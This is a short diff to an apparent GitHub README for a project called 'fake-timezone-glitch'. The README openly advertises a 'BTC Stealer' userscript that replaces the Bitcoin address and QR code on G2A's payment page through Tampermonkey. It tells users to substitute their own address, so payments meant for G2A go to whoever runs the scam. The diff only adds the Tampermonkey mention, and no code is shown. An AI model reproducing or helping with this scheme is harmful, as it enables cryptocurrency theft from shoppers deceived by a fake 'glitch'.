lucakonig/fake-timezone-glitch/README.md

 # G2A Fake "Timezone Glitch" - BTC Stealer - Replace address to your own

-The script changes Bitcoin address and QR code on G2A Payment page
+The script changes Bitcoin address and QR code on G2A Payment page by using Tampermonkey

 ![alt text](https://i.postimg.cc/brV97qH9/Screenshot-85.png)